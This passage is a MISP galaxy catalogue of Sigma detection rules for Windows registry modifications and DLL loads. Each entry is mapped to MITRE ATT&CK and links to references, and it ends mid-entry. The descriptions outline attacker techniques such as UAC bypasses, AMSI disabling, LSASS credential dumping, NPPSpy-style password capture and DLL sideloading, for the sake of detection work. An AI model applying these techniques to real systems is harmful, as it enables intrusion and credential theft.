https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml

Modification of Explorer Hidden Keys

Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.

The tag is: misp-galaxy:sigma-rules="Modification of Explorer Hidden Keys"

Modification of Explorer Hidden Keys has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

Table 9486. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_file.yml

Registry Modification to Hidden File Extension

Hides the file extension through modification of the registry

The tag is: misp-galaxy:sigma-rules="Registry Modification to Hidden File Extension"

Registry Modification to Hidden File Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"

Table 9487. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A

https://unit42.paloaltonetworks.com/ransomware-families/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml

Adwind RAT / JRAT - Registry

Detects javaw.exe in AppData folder as used by Adwind / JRAT

The tag is: misp-galaxy:sigma-rules="Adwind RAT / JRAT - Registry"

Adwind RAT / JRAT - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 9488. Table References

Links

https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf

https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml

Bypass UAC Using SilentCleanup Task

Detects the setting of the environement variable "windir" to a non default value. Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.

The tag is: misp-galaxy:sigma-rules="Bypass UAC Using SilentCleanup Task"

Bypass UAC Using SilentCleanup Task has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9489. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task

https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/

https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml

ClickOnce Trust Prompt Tampering

Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.

The tag is: misp-galaxy:sigma-rules="ClickOnce Trust Prompt Tampering"

ClickOnce Trust Prompt Tampering has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9490. Table References

Links

https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5

https://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prompt-behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_clickonce_trust_prompt.yml

Suspicious Service Installed

Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)

The tag is: misp-galaxy:sigma-rules="Suspicious Service Installed"

Suspicious Service Installed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9491. Table References

Links

https://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_service_installed.yml

DNS-over-HTTPS Enabled by Registry

Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.

The tag is: misp-galaxy:sigma-rules="DNS-over-HTTPS Enabled by Registry"

DNS-over-HTTPS Enabled by Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9493. Table References

Links

https://github.com/elastic/detection-rules/issues/1371

https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS

https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode

https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml

Potential WerFault ReflectDebugger Registry Value Abuse

Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.

The tag is: misp-galaxy:sigma-rules="Potential WerFault ReflectDebugger Registry Value Abuse"

Potential WerFault ReflectDebugger Registry Value Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 9494. Table References

Links

https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html

https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_reflectdebugger.yml

Disable Windows Security Center Notifications

Detect set UseActionCenterExperience to 0 to disable the Windows security center notification

The tag is: misp-galaxy:sigma-rules="Disable Windows Security Center Notifications"

Disable Windows Security Center Notifications has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9495. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml

Potential Persistence Via Event Viewer Events.asp

Detects potential registry persistence technique using the Event Viewer "Events.asp" technique

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Event Viewer Events.asp"

Potential Persistence Via Event Viewer Events.asp has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9496. Table References

Links

https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks

https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md

https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/

https://twitter.com/nas_bench/status/1626648985824788480

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml

Hide Schedule Task Via Index Value Tamper

Detects when the "index" value of a scheduled task is modified from the registry Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)

The tag is: misp-galaxy:sigma-rules="Hide Schedule Task Via Index Value Tamper"

Hide Schedule Task Via Index Value Tamper has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9497. Table References

Links

https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml

ETW Logging Disabled In .NET Processes - Sysmon Registry

Potential adversaries stopping ETW providers recording loaded .NET assemblies.

The tag is: misp-galaxy:sigma-rules="ETW Logging Disabled In .NET Processes - Sysmon Registry"

ETW Logging Disabled In .NET Processes - Sysmon Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9499. Table References

Links

https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables

https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/

https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf

https://twitter.com/xpn/status/1268712093928378368

https://bunnyinside.com/?term=f71e8cb9c76a

http://managed670.rssing.com/chan-5590147/all_p1.html

https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr

https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38

https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code

https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39

https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml

Potential Persistence Via COM Hijacking From Suspicious Locations

Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unsuale location

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via COM Hijacking From Suspicious Locations"

Potential Persistence Via COM Hijacking From Suspicious Locations has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

Table 9500. Table References

Links

https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)[https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml

Internet Explorer Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="Internet Explorer Autorun Keys Modification"

Internet Explorer Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9501. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml

Potential Credential Dumping Attempt Using New NetworkProvider - REG

Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it

The tag is: misp-galaxy:sigma-rules="Potential Credential Dumping Attempt Using New NetworkProvider - REG"

Potential Credential Dumping Attempt Using New NetworkProvider - REG has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 9502. Table References

Links

https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy

https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml

Potential Ransomware Activity Using LegalNotice Message

Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages

The tag is: misp-galaxy:sigma-rules="Potential Ransomware Activity Using LegalNotice Message"

Potential Ransomware Activity Using LegalNotice Message has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Internal Defacement - T1491.001" with estimative-language:likelihood-probability="almost-certain"

Table 9503. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1491.001/T1491.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_legalnotice_susp_message.yml

Disable Internal Tools or Feature in Registry

Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)

The tag is: misp-galaxy:sigma-rules="Disable Internal Tools or Feature in Registry"

Disable Internal Tools or Feature in Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9504. Table References

Links

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md

https://www.malwarebytes.com/blog/detections/pum-optional-nodispcpl

https://www.malwarebytes.com/blog/detections/pum-optional-nodispbackgroundpage

https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml

Potential AMSI COM Server Hijacking

Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless

The tag is: misp-galaxy:sigma-rules="Potential AMSI COM Server Hijacking"

Potential AMSI COM Server Hijacking has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9505. Table References

Links

https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/

https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml

Register New IFiltre For Persistence

Detects when an attacker register a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files

The tag is: misp-galaxy:sigma-rules="Register New IFiltre For Persistence"

Table 9506. Table References

Links

https://persistence-info.github.io/Data/ifilters.html

https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308

https://twitter.com/0gtweet/status/1468548924600459267

https://github.com/gtworek/PSBits/tree/master/IFilter

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml

VBScript Payload Stored in Registry

Detects VBScript content stored into registry keys as seen being used by UNC2452 group

The tag is: misp-galaxy:sigma-rules="VBScript Payload Stored in Registry"

VBScript Payload Stored in Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9507. Table References

Links

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml

Potential Persistence Via TypedPaths

Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via TypedPaths"

Table 9508. Table References

Links

https://forensafe.com/blogs/typedpaths.html

https://twitter.com/dez_/status/1560101453150257154

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml

ServiceDll Hijack

Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence.

The tag is: misp-galaxy:sigma-rules="ServiceDll Hijack"

ServiceDll Hijack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9509. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time

https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml

Unsigned Module Loaded by ClickOnce Application

Detects unsigned module load by ClickOnce application.

The tag is: misp-galaxy:sigma-rules="Unsigned Module Loaded by ClickOnce Application"

Unsigned Module Loaded by ClickOnce Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9510. Table References

Links

https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_clickonce_unsigned_module_loaded.yml

Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded

Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes. Tools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker’s machine.

The tag is: misp-galaxy:sigma-rules="Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded"

Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9511. Table References

Links

https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html

https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6

https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml

WMIC Loading Scripting Libraries

Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the /FORMAT argument switch to download and execute an XSL file (i.e js, vbs, etc).

The tag is: misp-galaxy:sigma-rules="WMIC Loading Scripting Libraries"

WMIC Loading Scripting Libraries has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220" with estimative-language:likelihood-probability="almost-certain"

Table 9512. Table References

Links

https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html

https://twitter.com/dez_/status/986614411711442944

https://lolbas-project.github.io/lolbas/Binaries/Wmic/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml

Potential Goopdate.DLL Sideloading

Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe

The tag is: misp-galaxy:sigma-rules="Potential Goopdate.DLL Sideloading"

Potential Goopdate.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9513. Table References

Links

https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_goopdate.yml

Potential appverifUI.DLL Sideloading

Detects potential DLL sideloading of "appverifUI.dll"

The tag is: misp-galaxy:sigma-rules="Potential appverifUI.DLL Sideloading"

Potential appverifUI.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9514. Table References

Links

https://fatrodzianko.com/2020/02/15/dll-side-loading-appverif-exe/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_appverifui.yml

Potential EACore.DLL Sideloading

Detects potential DLL sideloading of "EACore.dll"

The tag is: misp-galaxy:sigma-rules="Potential EACore.DLL Sideloading"

Potential EACore.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9515. Table References

Links

https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_eacore.yml

Potential 7za.DLL Sideloading

Detects potential DLL sideloading of "7za.dll"

The tag is: misp-galaxy:sigma-rules="Potential 7za.DLL Sideloading"

Potential 7za.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9516. Table References

Links

https://www.gov.pl/attachment/ee91f24d-3e67-436d-aa50-7fa56acf789d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_7za.yml

WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load

Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.

The tag is: misp-galaxy:sigma-rules="WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load"

WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 9517. Table References

Links

https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html

https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/

https://twitter.com/HunterPlaybook/status/1301207718355759107

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_wmi_scripteventconsumer.yml

Potential DLL Sideloading Via comctl32.dll

Detects potential DLL sideloading using comctl32.dll to obtain system privileges

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Via comctl32.dll"

Potential DLL Sideloading Via comctl32.dll has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9518. Table References

Links

https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt

https://github.com/binderlabs/DirCreate2System

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_comctl32.yml

Suspicious WSMAN Provider Image Loads

Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.

The tag is: misp-galaxy:sigma-rules="Suspicious WSMAN Provider Image Loads"

Suspicious WSMAN Provider Image Loads has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

Table 9519. Table References

Links

https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/

https://github.com/bohops/WSMan-WinRM

https://twitter.com/chadtilbury/status/1275851297770610688

https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml

Potential ShellDispatch.DLL Sideloading

Detects potential DLL sideloading of "ShellDispatch.dll"

The tag is: misp-galaxy:sigma-rules="Potential ShellDispatch.DLL Sideloading"

Potential ShellDispatch.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9520. Table References

Links

https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_shelldispatch.yml

Potential RjvPlatform.DLL Sideloading From Default Location

Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn’t created by default.

The tag is: misp-galaxy:sigma-rules="Potential RjvPlatform.DLL Sideloading From Default Location"

Potential RjvPlatform.DLL Sideloading From Default Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9521. Table References

Links

https://twitter.com/0gtweet/status/1666716511988330499

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_rjvplatform_default_location.yml

Suspicious Volume Shadow Copy Vssapi.dll Load

Detects the image load of VSS DLL by uncommon executables

The tag is: misp-galaxy:sigma-rules="Suspicious Volume Shadow Copy Vssapi.dll Load"

Suspicious Volume Shadow Copy Vssapi.dll Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 9522. Table References

Links

https://github.com/ORCx41/DeleteShadowCopies

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_vssapi_susp_load.yml

Suspicious Renamed Comsvcs DLL Loaded By Rundll32

Detects rundll32 loading a renamed comsvcs.dll to dump process memory

The tag is: misp-galaxy:sigma-rules="Suspicious Renamed Comsvcs DLL Loaded By Rundll32"

Suspicious Renamed Comsvcs DLL Loaded By Rundll32 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9523. Table References

Links

https://twitter.com/sbousseaden/status/1555200155351228419

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml

UAC Bypass With Fake DLL

Attempts to load dismcore.dll after dropping it

The tag is: misp-galaxy:sigma-rules="UAC Bypass With Fake DLL"

UAC Bypass With Fake DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9524. Table References

Links

https://steemit.com/utopian-io/@ah101/uac-bypassing-utility

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_via_dism.yml

UAC Bypass Using Iscsicpl - ImageLoad

Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL’s from temp or a any user controlled location in the users %PATH%

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using Iscsicpl - ImageLoad"

UAC Bypass Using Iscsicpl - ImageLoad has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9525. Table References

Links

https://twitter.com/wdormann/status/1547583317410607110

https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml

Potential Wazuh Security Platform DLL Sideloading

Detects potential DLL side loading of DLLs that are part of the Wazuh security platform

The tag is: misp-galaxy:sigma-rules="Potential Wazuh Security Platform DLL Sideloading"

Potential Wazuh Security Platform DLL Sideloading has relationships with:

